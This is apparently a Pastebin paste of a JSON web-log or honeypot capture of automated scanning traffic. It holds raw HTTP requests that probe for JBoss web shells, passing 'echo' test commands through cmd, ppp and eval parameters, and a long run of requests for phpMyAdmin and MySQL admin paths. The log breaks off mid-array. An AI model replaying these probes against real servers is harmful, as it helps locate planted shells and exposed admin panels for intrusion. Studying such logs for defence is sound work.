Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {
- "datas": [
- {
- "@timestamp": "2018-12-17T09:41:02.000Z",
- "data": "GET /manager/html HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:41:02.000Z",
- "data": "GET /a/pwn.jsp?cmd=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:41:02.000Z",
- "data": "GET /HCEGH/xunfeng.jsp?comment=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:41:01.000Z",
- "data": "GET /wstats/wstats.jsp?comment=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:41:00.000Z",
- "data": "GET /idssvc/idssvc.jsp?comment=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:41:00.000Z",
- "data": "GET /zecmd/zecmd.jsp?comment=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:41:00.000Z",
- "data": "GET /iesvc/iesvc.jsp?comment=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:59.000Z",
- "data": "GET /shellinvoker/shellinvoker.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: jexboss\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:59.000Z",
- "data": "GET /jvrx/cmd.jsp?pwd=everymorning\u0026cmd=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:58.000Z",
- "data": "GET /demo/404.jsp?bjh=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:58.000Z",
- "data": "GET /jbws/jbws.jsp?eval=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: jbosses\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:58.000Z",
- "data": "GET /dread/lock.jsp?tezaz=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:57.000Z",
- "data": "GET /console/jspzxc.jsp?cmd=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:56.000Z",
- "data": "GET /jexinv3/jexinv3.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:56.000Z",
- "data": "GET /jbossass/jbossass.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: jexboss\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:56.000Z",
- "data": "GET /jexinv4/jexinv4.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:55.000Z",
- "data": "GET /jexws4/jexws4.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:55.000Z",
- "data": "GET /jexinv/jexinv.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:54.000Z",
- "data": "GET /jexws2/jexws2.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:54.000Z",
- "data": "GET /jexws3/jexws3.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:52.000Z",
- "data": "GET /manager/html HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:52.000Z",
- "data": "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:51.000Z",
- "data": "GET /mysql/sqlmanager/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:51.000Z",
- "data": "GET /mysql/mysqlmanager/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:50.000Z",
- "data": "GET /mysql/dbadmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:50.000Z",
- "data": "GET /mysql/admin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:50.000Z",
- "data": "GET /phpmy/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:49.000Z",
- "data": "GET /phppma/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:48.000Z",
- "data": "GET /shopdb/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:48.000Z",
- "data": "GET /program/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:48.000Z",
- "data": "GET /phpMyAdmina/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:47.000Z",
- "data": "GET /phpMyAdmin123/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:47.000Z",
- "data": "GET /pwd/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:46.000Z",
- "data": "GET /phpMyAdmin1/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:46.000Z",
- "data": "GET /MyAdmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:46.000Z",
- "data": "GET /phpMyAdmion/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:45.000Z",
- "data": "GET /phpMyadmi/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:44.000Z",
- "data": "GET /phpmyadm1n/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:44.000Z",
- "data": "GET /phpMyAdm1n/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:44.000Z",
- "data": "GET /shaAdmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:43.000Z",
- "data": "GET /phpMyAdmin+++---/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:43.000Z",
- "data": "GET /v/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:42.000Z",
- "data": "GET /phpMyAbmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:42.000Z",
- "data": "GET /phpMyAdmin__/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:42.000Z",
- "data": "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:41.000Z",
- "data": "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:40.000Z",
- "data": "GET /claroline/phpMyAdmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:40.000Z",
- "data": "GET /typo3/phpmyadmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:40.000Z",
- "data": "GET /phpma/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:39.000Z",
- "data": "GET /pma-old/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:39.000Z",
- "data": "GET /phpMyAdmin.old/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:38.000Z",
- "data": "GET /tools/phpMyAdmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:38.000Z",
- "data": "GET /phpmyadmin-old/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:38.000Z",
- "data": "GET /phpMyAdminold/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:37.000Z",
- "data": "GET /www/phpMyAdmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:36.000Z",
- "data": "GET /xampp/phpmyadmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:36.000Z",
- "data": "GET /myadmin2/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:36.000Z",
- "data": "GET /phpMyadmin_bak/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:35.000Z",
- "data": "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:35.000Z",
- "data": "GET /myadmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:34.000Z",
- "data": "GET /phpmyadmin1/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:34.000Z",
- "data": "GET /phpmyadmin2/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:34.000Z",
- "data": "GET /phpmyadmin0/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:33.000Z",
- "data": "GET /phpAdmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:32.000Z",
- "data": "GET /mysql-admin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:32.000Z",
- "data": "GET /phpadmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:32.000Z",
- "data": "GET /mysql_admin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:31.000Z",
- "data": "GET /admin/phpmyadmin2/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:31.000Z",
- "data": "GET /mysqladmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:30.000Z",
- "data": "GET /admin/mysql2/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:30.000Z",
- "data": "GET /admin/phpmyadmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:30.000Z",
- "data": "GET /admin/phpMyAdmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:29.000Z",
- "data": "GET /admin/mysql/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
